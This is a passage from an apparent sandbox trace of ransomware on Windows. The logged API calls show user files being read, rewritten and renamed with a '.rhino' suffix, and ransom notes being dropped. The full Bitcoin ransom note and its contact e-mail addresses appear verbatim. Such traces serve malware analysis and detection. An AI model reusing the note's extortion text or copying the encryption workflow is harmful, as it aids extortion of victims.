halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.808] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.867] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x1f68 [0090.867] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2088, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.868] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.868] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.871] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.871] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x1f68, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x1f68, lpOverlapped=0x0) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.872] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.872] GetLastError () returned 0x0 [0090.873] SetLastError (dwErrCode=0x0) [0090.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1f8b) returned 0x75ef78 [0090.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0110 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0218 [0090.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.873] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0110 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b03a0 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b04e8 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b06d0 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04e8 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b09a0 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06d0 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x760f10 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09a0 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b03a0 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f10 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x760f10 [0090.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x761d28 [0090.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760f10 | out: hHeap=0x6d0000) returned 1 [0090.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x763268 [0090.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761d28 | out: hHeap=0x6d0000) returned 1 [0090.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x765230 [0090.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763268 | out: hHeap=0x6d0000) returned 1 [0090.877] WriteFile (in: hFile=0x104, lpBuffer=0x765240*, nNumberOfBytesToWrite=0x2088, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x765240*, lpNumberOfBytesWritten=0x2cfa04*=0x2088, lpOverlapped=0x0) returned 1 [0090.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x765230 | out: hHeap=0x6d0000) returned 1 [0090.878] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2088, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.878] CloseHandle (hObject=0x104) returned 1 [0090.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b03a0 [0090.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b04b8 [0090.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.880] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04b8 | out: hHeap=0x6d0000) returned 1 [0090.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0218 | out: hHeap=0x6d0000) returned 1 [0090.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0110 [0090.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.881] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b01d8 [0090.881] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.882] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.883] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x3 [0090.883] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x123, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.884] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.884] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x3, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x3, lpOverlapped=0x0) returned 1 [0090.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.887] GetLastError () returned 0x0 [0090.887] SetLastError (dwErrCode=0x0) [0090.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01d8 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02e0 [0090.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.887] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b828 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0090.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b828 [0090.887] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0090.887] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x123) returned 0x23b0468 [0090.888] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.888] WriteFile (in: hFile=0x104, lpBuffer=0x23b0468*, nNumberOfBytesToWrite=0x123, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0468*, lpNumberOfBytesWritten=0x2cfa04*=0x123, lpOverlapped=0x0) returned 1 [0090.888] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.888] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x123, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.888] CloseHandle (hObject=0x104) returned 1 [0090.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b01d8 [0090.889] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x166) returned 0x23b0468 [0090.889] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.889] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02e0 | out: hHeap=0x6d0000) returned 1 [0090.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0090.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0090.890] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0090.890] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.891] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0090.891] WriteFile (in: hFile=0x104, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0090.893] CloseHandle (hObject=0x104) returned 1 [0090.893] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0090.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.894] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x7 [0090.894] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x127, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.895] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.895] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x7, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x7, lpOverlapped=0x0) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.897] GetLastError () returned 0x0 [0090.897] SetLastError (dwErrCode=0x0) [0090.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x7) returned 0x72b7f8 [0090.897] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0090.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.898] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b828 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0090.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b828 [0090.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0090.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b828 [0090.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.898] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x127) returned 0x23b02d8 [0090.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.899] WriteFile (in: hFile=0x104, lpBuffer=0x23b02d8*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b02d8*, lpNumberOfBytesWritten=0x2cfa04*=0x127, lpOverlapped=0x0) returned 1 [0090.899] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0090.899] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x127, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.899] CloseHandle (hObject=0x104) returned 1 [0090.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0090.900] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b02d8 [0090.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0090.900] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0090.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0090.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0090.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0090.901] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0090.901] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.901] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0090.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.902] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x0 [0090.902] CloseHandle (hObject=0x104) returned 1 [0090.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail 